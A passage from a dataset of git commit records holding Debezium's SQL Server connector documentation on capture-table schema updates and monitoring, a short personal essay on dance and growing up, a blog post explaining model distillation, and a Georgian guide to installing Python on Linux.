`topic.naming.strategy`>>\n|`io.debezium.schema.SchemaTopicNamingStrategy`\n|The name of the `TopicNamingStrategy` class that determines the topic names for data change, schema change, transaction, and heartbeat events; defaults to `SchemaTopicNamingStrategy`.\n\n|[[sqlserver-property-topic-delimiter]]<<sqlserver-property-topic-delimiter, `topic.delimiter`>>\n|`.`\n|Specifies the delimiter for topic names; defaults to `.`.\n\n|[[sqlserver-property-topic-cache-size]]<<sqlserver-property-topic-cache-size, `topic.cache.size`>>\n|`10000`\n|The size of the bounded concurrent hash map that caches topic names. This cache helps determine the topic name that corresponds to a given data collection.\n\n|[[sqlserver-property-topic-heartbeat-prefix]]<<sqlserver-property-topic-heartbeat-prefix, `+topic.heartbeat.prefix+`>>\n|`__debezium-heartbeat`\n|Controls the name of the topic to which the connector sends heartbeat messages. The topic name has this pattern: +\n +\n_topic.heartbeat.prefix_._topic.prefix_ +\n +\nFor example, if the topic prefix is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.\n\n|[[sqlserver-property-topic-transaction]]<<sqlserver-property-topic-transaction, `topic.transaction`>>\n|`transaction`\n|Controls the name of the topic to which the connector sends transaction metadata messages. 
The topic name has this pattern: +\n +\n_topic.prefix_._topic.transaction_ +\n +\nFor example, if the topic prefix is `fulfillment`, the default topic name is `fulfillment.transaction`.\n\nFor more information, see xref:sqlserver-transaction-metadata[Transaction Metadata].\n\n|===\n\n[id=\"debezium-sqlserver-connector-database-history-configuration-properties\"]\n==== {prodname} SQL Server connector database schema history configuration properties\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-configuration-database-history-properties.adoc[leveloffset=+1]\n\n[id=\"debezium-sqlserver-connector-pass-through-database-driver-configuration-properties\"]\n==== {prodname} SQL Server connector pass-through database driver configuration properties\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-pass-through-database-driver-configuration-properties.adoc[leveloffset=+1]\n\n\n\/\/ Type: assembly\n\/\/ ModuleID: refreshing-capture-tables-after-a-schema-change\n\/\/ Title: Refreshing capture tables after a schema change\n[[sqlserver-schema-evolution]]\n== Database schema evolution\n\nWhen change data capture is enabled for a SQL Server table, as changes occur in the table, event records are persisted to a capture table on the server.\nIf you introduce a change in the structure of the source table, for example, by adding a new column, that change is not dynamically reflected in the change table.\nFor as long as the capture table continues to use the outdated schema, the {prodname} connector is unable to emit data change events for the table correctly.\nYou must intervene to refresh the capture table to enable the connector to resume processing change events.\n\nBecause of the way that CDC is implemented in SQL Server, you cannot use {prodname} to update capture tables.\nTo refresh capture tables, one must be a SQL Server database operator with elevated privileges.\nAs a {prodname} user, you must coordinate tasks with the SQL Server database operator to complete the schema refresh and restore streaming to Kafka topics.\n\nYou can use one of the following methods to update capture tables after a schema change:\n\n* xref:{link-sqlserver-connector}#offline-schema-updates[Offline schema updates] require you to stop the {prodname} connector before you can update capture tables.\n* xref:{link-sqlserver-connector}#online-schema-updates[Online schema updates] can update capture tables while the {prodname} connector is running.\n\nThere are advantages and disadvantages to using each type of procedure.\n\n[WARNING]\n====\nWhether you use the online or offline update method, you must complete the entire schema update process before you apply subsequent schema updates on the same source table.\nThe best practice is to execute all DDLs in a single batch so the procedure can be run only once.\n====\n\n[NOTE]\n====\nSome schema changes are not supported on source tables that have CDC enabled.\nFor example, if CDC is enabled on a table, SQL Server does not allow you to change the table's schema by renaming one of its columns or changing a column's type.\n====\n\n[NOTE]\n====\nAfter you change a column in a source table from `NULL` to `NOT NULL` or vice versa, the SQL Server connector cannot correctly capture the changed information until after you create a new capture instance.\nIf you do not create a new capture table after a change to the column designation, change event records that the connector emits do not correctly indicate whether the column is optional.
That is, columns that were previously defined as optional (or `NULL`) continue to be, despite now being defined as `NOT NULL`.\nSimilarly, columns that had been defined as required (`NOT NULL`) retain that designation, although they are now defined as `NULL`.\n====\n\n\/\/ Type: procedure\n\/\/ ModuleID: debezium-sql-server-connector-running-an-offline-update-after-a-schema-change\n\/\/ Title: Running an offline update after a schema change\n[id=\"offline-schema-updates\"]\n=== Offline schema updates\n\nOffline schema updates provide the safest method for updating capture tables.\nHowever, offline updates might not be feasible for use with applications that require high availability.\n\n.Prerequisites\n* An update was committed to the schema of a SQL Server table that has CDC enabled.\n* You are a SQL Server database operator with elevated privileges.\n\n.Procedure\n\n1. Suspend the application that updates the database.\n2. Wait for the {prodname} connector to stream all unstreamed change event records.\n3. Stop the {prodname} connector.\n4. Apply all changes to the source table schema.\n5. Create a new capture table for the updated source table by using the `sys.sp_cdc_enable_table` stored procedure with a unique value for the parameter `@capture_instance`, as sketched after this procedure.\n6. Resume the application that you suspended in Step 1.\n7. Start the {prodname} connector.\n8. After the {prodname} connector starts streaming from the new capture table, drop the old capture table by running the stored procedure `sys.sp_cdc_disable_table` with the parameter `@capture_instance` set to the old capture instance name.
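\nFor example, step 5 might look like the following for a hypothetical `dbo.orders` source table (the table and capture-instance names are illustrative; the call mirrors the one shown in the online-update example below):\n\n[source,sql]\n----\nEXEC sys.sp_cdc_enable_table @source_schema = 'dbo', @source_name = 'orders', @role_name = NULL, @supports_net_changes = 0, @capture_instance = 'dbo_orders_v2';\nGO\n----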
\n\n\/\/ Type: procedure\n\/\/ ModuleID: debezium-sql-server-connector-running-an-online-update-after-a-schema-change\n\/\/ Title: Running an online update after a schema change\n[id=\"online-schema-updates\"]\n=== Online schema updates\n\nThe procedure for completing an online schema update is simpler than the procedure for running an offline schema update,\nand you can complete it without requiring any downtime in application and data processing.\nHowever, with online schema updates, a potential processing gap can occur after you update the schema in the source database,\nbut before you create the new capture instance.\nDuring that interval, change events continue to be captured by the old instance of the change table,\nand the change data that is saved to the old table retains the structure of the earlier schema.\nSo, for example, if you added a new column to a source table, change events that are produced before the new capture table is ready do not contain a field for the new column.\nIf your application does not tolerate such a transition period, it is best to use the offline schema update procedure.\n\n.Prerequisites\n* An update was committed to the schema of a SQL Server table that has CDC enabled.\n* You are a SQL Server database operator with elevated privileges.\n\n.Procedure\n1. Apply all changes to the source table schema.\n2. Create a new capture table for the updated source table by running the `sys.sp_cdc_enable_table` stored procedure with a unique value for the parameter `@capture_instance`.\n3. When {prodname} starts streaming from the new capture table, you can drop the old capture table by running the `sys.sp_cdc_disable_table` stored procedure with the parameter `@capture_instance` set to the old capture instance name.\n\n\n.Example: Running an online schema update after a database schema change\nifdef::community[]\nLet's deploy the SQL Server based https:\/\/github.com\/debezium\/debezium-examples\/tree\/main\/tutorial#using-sql-server[{prodname} tutorial] to demonstrate the online schema update.\n\nIn the following example, a column `phone_number` is added to the `customers` table.\n\n. Type the following command to start the database shell:\n+\n[source,shell]\n----\ndocker-compose -f docker-compose-sqlserver.yaml exec sqlserver bash -c '\/opt\/mssql-tools\/bin\/sqlcmd -U sa -P $SA_PASSWORD -d testDB'\n----\nendif::community[]\n\nifdef::product[]\n\nThe following example shows how to complete an online schema update in the change table after the column `phone_number` is added to the `customers` source table.\n\nendif::product[]\n\n. Modify the schema of the `customers` source table by running the following query to add the `phone_number` field:\n+\n[source,sql]\n----\nALTER TABLE customers ADD phone_number VARCHAR(32);\n----\n\n. Create the new capture instance by running the `sys.sp_cdc_enable_table` stored procedure.\n+\n[source,sql]\n----\nEXEC sys.sp_cdc_enable_table @source_schema = 'dbo', @source_name = 'customers', @role_name = NULL, @supports_net_changes = 0, @capture_instance = 'dbo_customers_v2';\nGO\n----\n\n. Insert new data into the `customers` table by running the following query:\n+\n[source,sql]\n----\nINSERT INTO customers(first_name,last_name,email,phone_number) VALUES ('John','Doe','john.doe@example.com', '+1-555-123456');\nGO\n----\n+\nThe Kafka Connect log reports on configuration updates through entries similar to the following message:\n+\n[source,shell]\n----\nconnect_1 | 2019-01-17 10:11:14,924 INFO || Multiple capture instances present for the same table: Capture instance \"dbo_customers\" [sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_CT, startLsn=00000024:00000d98:0036, changeTableObjectId=1525580473, stopLsn=00000025:00000ef8:0048] and Capture instance \"dbo_customers_v2\" [sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_v2_CT, startLsn=00000025:00000ef8:0048, changeTableObjectId=1749581271, stopLsn=NULL] [io.debezium.connector.sqlserver.SqlServerStreamingChangeEventSource]\nconnect_1 | 2019-01-17 10:11:14,924 INFO || Schema will be changed for ChangeTable [captureInstance=dbo_customers_v2, sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_v2_CT, startLsn=00000025:00000ef8:0048, changeTableObjectId=1749581271, stopLsn=NULL] [io.debezium.connector.sqlserver.SqlServerStreamingChangeEventSource]\n...\nconnect_1 | 2019-01-17 10:11:33,719 INFO || Migrating schema to ChangeTable [captureInstance=dbo_customers_v2, sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_v2_CT, startLsn=00000025:00000ef8:0048, changeTableObjectId=1749581271, stopLsn=NULL] [io.debezium.connector.sqlserver.SqlServerStreamingChangeEventSource]\n----\n+\nEventually, the `phone_number` field is added to the schema and its value appears in messages written to the Kafka topic.\n+\n[source,json]\n----\n...\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"phone_number\"\n }\n...\n \"after\": {\n \"id\": 1005,\n \"first_name\": \"John\",\n \"last_name\": \"Doe\",\n \"email\": \"john.doe@example.com\",\n \"phone_number\": \"+1-555-123456\"\n },\n----\n\n. Drop the old capture instance by running the `sys.sp_cdc_disable_table` stored procedure.\n+\n[source,sql]\n----\nEXEC sys.sp_cdc_disable_table @source_schema = 'dbo', @source_name = 'customers', @capture_instance = 'dbo_customers';\nGO\n----
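\n+\nAfter the drop, you can confirm which capture instances remain by querying `cdc.change_tables`, a standard SQL Server CDC metadata table (a quick sanity check; this query is not part of the official procedure):\n+\n[source,sql]\n----\nSELECT capture_instance, create_date FROM cdc.change_tables;\nGO\n----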
\"email\": \"john.doe@example.com\",\n \"phone_number\": \"+1-555-123456\"\n },\n----\n\n. Drop the old capture instance by running the `sys.sp_cdc_disable_table` stored procedure.\n+\n[source,sql]\n----\nEXEC sys.sp_cdc_disable_table @source_schema = 'dbo', @source_name = 'dbo_customers', @capture_instance = 'dbo_customers';\nGO\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-sql-server-connector-performance\n\/\/ Title: Monitoring {prodname} SQL Server connector performance\n[[sqlserver-monitoring]]\n== Monitoring\n\nThe {prodname} SQL Server connector provides three types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\nThe connector provides the following metrics:\n\n* xref:sqlserver-snapshot-metrics[Snapshot metrics] for monitoring the connector when performing snapshots.\n* xref:sqlserver-streaming-metrics[Streaming metrics] for monitoring the connector when reading CDC table data.\n* xref:sqlserver-schema-history-metrics[Schema history metrics] for monitoring the status of the connector's schema history.\n\nFor information about how to expose the preceding metrics through JMX, see the {link-prefix}:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation].\n\n\/\/ Type: reference\n\/\/ ModuleID: debezium-sqlserver-connector-snapshot-metrics\n\/\/ Title: {prodname} SQL Server connector snapshot metrics\n[[sqlserver-snapshot-metrics]]\n=== Snapshot metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=sqlserver-snapshot]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-incremental-snapshot-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: debezium-sqlserver-connector-streaming-metrics\n\/\/ Title: {prodname} SQL Server connector streaming metrics\n[[sqlserver-streaming-metrics]]\n=== Streaming metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=sqlserver-streaming]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: debezium-sqlserver-connector-schema-history-metrics\n\/\/ Title: {prodname} SQL Server connector schema history metrics\n[[sqlserver-schema-history-metrics]]\n=== Schema history metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff8d40e1d68f77370d889efc33eaf0078d337a46","subject":"update date","message":"update date","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/dance_as_a_metaphor_of_life.adoc","new_file":"content\/writings\/dance_as_a_metaphor_of_life.adoc","new_contents":"---\ntitle: \"Dance as a metaphor of life\"\nurl: \"\/dance_as_a_metaphor_of_life\"\naliases: []\ndescription: \ndate: 2018-01-13\ndraft: true\nacknowledgement: \ncategories: [\"Writings\"]\ntags: []\npeople: []\nplaces: []\nlocations: []\n---\n\n= Dance as a metaphor of life\nAnton Podviaznikov <anton@podviaznikov.com>\n:revdate: 2018-01-14\n:docdate: 2018-01-14\n:nofooter:\n:document_type: writing\n:tags: \"\"\n\nRemember when you were a kid you could dance and enjoy it enormously even if you _didn't know how_ to dance?\r\n\r\nAfter 
you grow out of childhood, you lose that bliss. \r\nYou're starting to learn how to dance in school. \r\nIt's painful, and it takes time, and it might not be fun. \r\nAnd those years are filled with effort, tears, setbacks, lost hope, varying levels of motivation, ups and downs, defeats and victories.\r\n\r\nAnd then, maybe, if you're persistent and lucky, you might rediscover the joy from your childhood again. \r\nAnd that is the point where you know how to dance as a professional, and you feel it and enjoy it as a kid. \r\nThat is the integration point: your inner child integrated with an adult to form a mature creature. \r\n\r\nFor me, that is the metaphor of life. \r\nYou go from childhood - which most people enjoy - to the sometimes painful period of adulthood, where you learn how to live and how to bring that joy back, \r\nand when you're done - you are a mature person. \r\nThe one who has a deep understanding of life and knows how to enjoy and appreciate it. \r\nIt is not about just rediscovering what was lost during adulthood. \r\nIt's about bringing together all sides: mind and body and soul. \r\nIt's this three-dimensionality that gives new depth to the joy. \r\nThat is the whole point of growing up - to lose joy so you can find it again in a new broader sense and with new intensity.\n","old_contents":"---\ntitle: \"Dance as a metaphor of life\"\nurl: \"\/dance_as_a_metaphor_of_life\"\naliases: []\ndescription: \ndate: 0-00-00\ndraft: true\nacknowledgement: \ncategories: [\"Writings\"]\ntags: []\npeople: []\nplaces: []\nlocations: []\n---\n\n= Dance as a metaphor of life\nAnton Podviaznikov <anton@podviaznikov.com>\n:revdate: 2018-01-14\n:docdate: 2018-01-14\n:nofooter:\n:document_type: writing\n:tags: \"\"\n\nRemember when you were a kid you could dance and enjoy it enormously even if you _didn't know how_ to dance?\r\n\r\nAfter you grow out of childhood, you lose that bliss. \r\nYou're starting to learn how to dance in school. \r\nIt's painful, and it takes time, and it might not be fun. \r\nAnd those years are filled with effort, tears, setbacks, lost hope, varying levels of motivation, ups and downs, defeats and victories.\r\n\r\nAnd then, maybe, if you're persistent and lucky, you might rediscover the joy from your childhood again. \r\nAnd that is the point where you know how to dance as a professional, and you feel it and enjoy it as a kid. \r\nThat is the integration point: your inner child integrated with an adult to form a mature creature. \r\n\r\nFor me, that is the metaphor of life. \r\nYou go from childhood - which most people enjoy - to the sometimes painful period of adulthood, where you learn how to live and how to bring that joy back, \r\nand when you're done - you are a mature person. \r\nThe one who has a deep understanding of life and knows how to enjoy and appreciate it. \r\nIt is not about just rediscovering what was lost during adulthood. \r\nIt's about bringing together all sides: mind and body and soul. \r\nIt's this three-dimensionality that gives new depth to the joy. 
\r\nThat is the whole point of growing up - to lose joy so you can find it again in a new broader sense and with new intensity.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e2db9295d310ec57a1a839a8a6cddcb738d1f63b","subject":"Update 2019-09-10-Model-Distillation.adoc","message":"Update 2019-09-10-Model-Distillation.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-09-10-Model-Distillation.adoc","new_file":"_posts\/2019-09-10-Model-Distillation.adoc","new_contents":"= Model Distillation\n:hp-image: https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/carolien-van-oijen-GRlRHqEqZTc-unsplash.jpg\n:published_at: 2019-09-10\n:hp-tags: distillation, machine learning\n\n[.lead]\n*How most of the information in large models can be transferred to a small model using soft targets, and what that says about the relationship of information to the dynamics of learning.*\n\nimage::https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/carolien-van-oijen-GRlRHqEqZTc-unsplash.jpg[Bee]\n\n'''\n.Recent NLP language models\n[width=\"50%\",cols=\"<,<\",frame=\"all\",grid=\"all\"]\n|===\n|*model*\n|*parameters*\n\n|BERT-base\n|110 million\n\n|BERT-large\n|340 million\n\n|Facebook XLM\n|665 million\n\n|OpenAI GPT-2\n|774 million\n|===\n'''\n\nThe upward trend of model sizes raises hurdles for the application of these models in the shape of computation and scalability, and requires decisions on the trade-off between accuracy, potency and deployability. After reading http:\/\/www.nlp.town\/blog\/distilling-bert\/[this blog post], I decided to try to summarize (distill) the concept of model distillation, and talk about why this struck me as such an interesting idea.\n\n.Model Distillation. graphic by Anshuman Sahoo\nimage::https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/distill.png[Model Distillation]\n\n'''\n\nAs shown above, the method of distillation relies on the idea of *_soft targets_* and *_softmax temperature_*.\n\n'''\n\n.Softmax Function with Temperature\nimage::https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/tempsoftmax.png[Model Distillation]\n\n'''\n\nhttps:\/\/arxiv.org\/pdf\/1503.02531.pdf[Hinton et al., 2015] introduced the concept of \"softmax temperature\". The probability p~i~ of class i is calculated from the logits z as p~i~ = exp(z~i~\/T) \/ \u03a3~j~ exp(z~j~\/T). T is the temperature parameter - as you can see, setting T = 1 gives us the standard softmax function. In the paper, they also found that if the ground truth labels are available, it improves the model if the loss to optimize includes training on ground truth labels in addition to the soft target outputs of the teacher model (as shown in the figure, student loss is added to distillation loss).\n\nOn a philosophical line of thought, the paper presents an analogy of some insects in nature that optimize based on their stage-of-life requirement - larval forms to extract nutrition from the environment and an adult form for travelling and reproduction; whereas cumbersome, large and often ensemble models remain the same during training and deployment. A conceptual block that may explain our hesitation to modify trained models is our assumption that changing learned parameters may lead to loss of knowledge. Another assumption made is that optimizing an objective function for the training set is close to optimizing the user's true objective - generalizing well to unseen data. 
However, ideal generalization to the user objective requires knowledge that might not be available in the training data.\n\n\n\n","old_contents":"= Model Distillation\n:hp-image: https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/carolien-van-oijen-GRlRHqEqZTc-unsplash.jpg\n:published_at: 2019-09-10\n:hp-tags: distillation, machine learning\n\n[.lead]\n*How most of the information in large models can be transferred to a small model using soft targets, and what that says about the relationship of information to the dynamics of learning.*\n\nimage::https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/carolien-van-oijen-GRlRHqEqZTc-unsplash.jpg[Bee]\n\n'''\n.Recent NLP language models\n[width=\"50%\",cols=\"<,<\",frame=\"all\",grid=\"all\"]\n|===\n|*model*\n|*parameters*\n\n|BERT-base\n|110 million\n\n|BERT-large\n|340 million\n\n|Facebook XLM\n|665 million\n\n|OpenAI GPT-2\n|774 million\n|===\n'''\n\nThe upward trend of model sizes raises hurdles for the application of these models in the shape of computation and scalability, and requires decisions on the trade-off between accuracy, potency and deployability. Following reading http:\/\/www.nlp.town\/blog\/distilling-bert\/[this blog post], I decided to try to summarize (distill) the concept of model distillation, and talk about why this struck me as such an interesting idea.\n\nimage::https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/distill.png[Model Distillation]\n\n'''\n\nAs shown above, the method of distillation relies on the idea of *_soft targets_* and *_softmax temperature_*.\n\n'''\n\nimage::https:\/\/github.com\/anshu92\/blog\/raw\/gh-pages\/images\/tempsoftmax.png[Model Distillation]\n\n'''\n\nhttps:\/\/arxiv.org\/pdf\/1503.02531.pdf[Hinton et al., 2015] introduced the concept of \"softmax temperature\". The probability p~i~ of class i is calculated from the logits z. T is the temperature parameter - as you can see, setting T = 1 gives us the standard softmax function. In the paper, they also found that if the ground truth labels are available, it improves the model if the loss to optimize includes training on ground truth labels in addition to the soft target outputs of the teacher model(as shown in the figure, student loss is added to distillation loss).\n\nOn a philosophical line of thought, the paper presents an analogy of some insects in nature that optimize based on their stage-of-life requirement - larval forms to extract nutrition from environment and an adult form for travellig and reproduction; whereas cumbersome, large and often ensemble models remain the same during training and deployment. A conceptual block that may explain our hesitation of modifying trained models is our assumption that changing learned parameters may lead to loss of knowledge. Another assumption made is that the optimizing an objective function for the training set is close to optimizing the user's true objective - generalizing well to unseen data. 
However, ideal generalization to the user objective requires knowledge that might not be available in the training data.\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"28d6694e7a0e52b59dc0f7f00bd7707c092afa61","subject":"Update 2016-01-13-how-to-install-python-on-linux.adoc","message":"Update 2016-01-13-how-to-install-python-on-linux.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_contents":"= \u10e0\u10dd\u10d2\u10dd\u10e0 \u10d3\u10d0\u10d5\u10d0\u10e7\u10d4\u10dc\u10dd\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8 \u10da\u10d8\u10dc\u10e3\u10e5\u10e1\u10d6\u10d4\n:hp-alt-title: how to install python on linux\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0 \u10e8\u10d4\u10d8\u10eb\u10da\u10d4\u10d1\u10d0 \u10dc\u10d4\u10d1\u10d8\u10e1\u10db\u10d8\u10d4\u10e0 \u10dd\u10de\u10d4\u10e0\u10d0\u10ea\u10d8\u10e3\u10da \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d0\u10d6\u10d4. \u10e0\u10dd\u10d2\u10dd\u10e0\u10d4\u10d1\u10d8\u10ea\u10d0\u10d0 \u10db\u10d0\u10d2. Windows, Unix \u10d3\u10d0 Linux \u10dd\u10de\u10d4\u10e0\u10d0\u10ea\u10d8\u10e3\u10da \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d4\u10d1\u10d6\u10d4.\n\u10db\u10d0\u10e0\u10e2\u10d8\u10d5\u10d8 \u10d2\u10d6\u10d0 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d0\u10e0\u10d8\u10e1 package manager \u10d8\u10e1 \u10d2\u10d0\u10db\u10dd\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0, \u10db\u10d0\u10d2. apt-get, yum, pacman \u10d3\u10d0 \u10d0.\u10e8.\n\ndebian\/ubuntu \u10d3\u10d8\u10e1\u10e2\u10e0\u10d8\u10d1\u10e3\u10e2\u10d8\u10d5\u10d4\u10d1\u10d6\u10d4 \u10e8\u10d4\u10d2\u10d5\u10d8\u10eb\u10da\u10d8\u10d0 \u10d2\u10d0\u10d5\u10e3\u10e8\u10d5\u10d0\u10d7 \u10d1\u10e0\u10eb\u10d0\u10dc\u10d4\u10d1\u10d0\n\u10db\u10d0\u10d2. 
\u10d7\u10e3 \u10d2\u10d5\u10d8\u10dc\u10d3\u10d0 2.x \u10d5\u10d4\u10e0\u10e1\u10d8\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0\n\n * sudo apt-get install python2.7\n\n\u10d7\u10e3 \u10d2\u10d5\u10d8\u10dc\u10d3\u10d0 3.x \u10d5\u10d4\u10e0\u10e1\u10d8\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0\n\n * sudo apt-get install python3.3\n \n\n\u10d0\u10e1\u10d4\u10d5\u10d4 \u10e8\u10d4\u10d2\u10d5\u10d8\u10eb\u10da\u10d8\u10d0 \u10d3\u10d0\u10d5\u10d0\u10e7\u10d4\u10dc\u10dd\u10d7 \u10d1\u10dd\u10da\u10dd \u10d5\u10d4\u10e0\u10e1\u10d8\u10d0 \u10e1\u10dd\u10e0\u10e1\u10d8\u10d3\u10d0\u10dc, \u10e1\u10dd\u10e0\u10e1\u10d8\u10e1 \u10d2\u10d0\u10d3\u10db\u10dd\u10ec\u10d4\u10e0\u10d0 \u10e8\u10d4\u10d2\u10d8\u10eb\u10da\u10d8\u10d0\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10dd\u10e4\u10d8\u10ea\u10d8\u10d0\u10da\u10e3\u10e0\u10d8 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d8\u10d3\u10d0\u10dc \u10d0\u10dc Ftp \u10d3\u10d0\u10dc - https:\/\/www.python.org\/ftp\/python\/ [Python Source Code] \u10d5\u10d8\u10e0\u10e9\u10d4\u10d5\u10d7 \u10d1\u10dd\u10da\u10dd \u10d5\u10d4\u10e0\u10e1\u10d8\u10d0\u10e1 3.5.1 \u10d3\u10d0 \u10d5\u10d8\u10ec\u10d4\u10e0\u10d7 *.tgz \u10e4\u10dd\u10e0\u10db\u10d0\u10e2\u10d8\u10e1 \u10e4\u10d0\u10d8\u10da\u10e1 Python-3.5.1.tgz \u10e8\u10d4\u10db\u10d3\u10d4\u10d2 \u10d5\u10ee\u10e1\u10dc\u10d8\u10d7 \u10e2\u10d4\u10e0\u10db\u10d8\u10dc\u10d0\u10da\u10e1 \u10d3\u10d0 \u10d5\u10e3\u10e8\u10d5\u10d4\u10d1\u10d7 \u10e5\u10d5\u10d4\u10db\u10dd\u10d7 \u10db\u10dd\u10ea\u10d4\u10db\u10e3\u10da \u10d1\u10e0\u10eb\u10d0\u10dc\u10d4\u10d1\u10d4\u10d1\u10e1\n\n * wget http:\/\/python.org\/ftp\/python\/3.5.1\/Python-3.5.1.tgz\n * tar -xvf Python-3.5.1.tgz\n * cd Python-3.5.1\n * .\/configure\n * make\n * make altinstall\n \n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d8\u10e1 \u10de\u10e0\u10dd\u10ea\u10d4\u10e1\u10d8 \u10ec\u10d0\u10e0\u10db\u10d0\u10e2\u10d4\u10d1\u10d8\u10d7 \u10d3\u10d0\u10e1\u10e0\u10e3\u10da\u10d3\u10d0.\n\u10d8\u10ee. \u10e1\u10e3\u10e0\u10d0\u10d7\u10d8\nimage:: pythonge.png\n\n:hp-tags: title[\u10de\u10d8\u10d7\u10dd\u10dc\u10d8],title[\u10da\u10d8\u10dc\u10e3\u10e5\u10e1\u10d8]","old_contents":"= \u10e0\u10dd\u10d2\u10dd\u10e0 \u10d3\u10d0\u10d5\u10d0\u10e7\u10d4\u10dc\u10dd\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8 \u10da\u10d8\u10dc\u10e3\u10e5\u10e1\u10d6\u10d4\n:hp-alt-title: how to install python on linux\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0 \u10e8\u10d4\u10d8\u10eb\u10da\u10d4\u10d1\u10d0 \u10dc\u10d4\u10d1\u10d8\u10e1\u10db\u10d8\u10d4\u10e0 \u10dd\u10de\u10d4\u10e0\u10d0\u10ea\u10d8\u10e3\u10da \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d0\u10d6\u10d4. \u10e0\u10dd\u10d2\u10dd\u10e0\u10d4\u10d1\u10d8\u10ea\u10d0\u10d0 \u10db\u10d0\u10d2. Windows, Unix \u10d3\u10d0 Linux \u10dd\u10de\u10d4\u10e0\u10d0\u10ea\u10d8\u10e3\u10da \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d4\u10d1\u10d6\u10d4.\n\u10db\u10d0\u10e0\u10e2\u10d8\u10d5\u10d8 \u10d2\u10d6\u10d0 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d3\u10d0\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d0\u10e0\u10d8\u10e1 package manager \u10d8\u10e1 \u10d2\u10d0\u10db\u10dd\u10e7\u10d4\u10dc\u10d4\u10d1\u10d0, \u10db\u10d0\u10d2. 
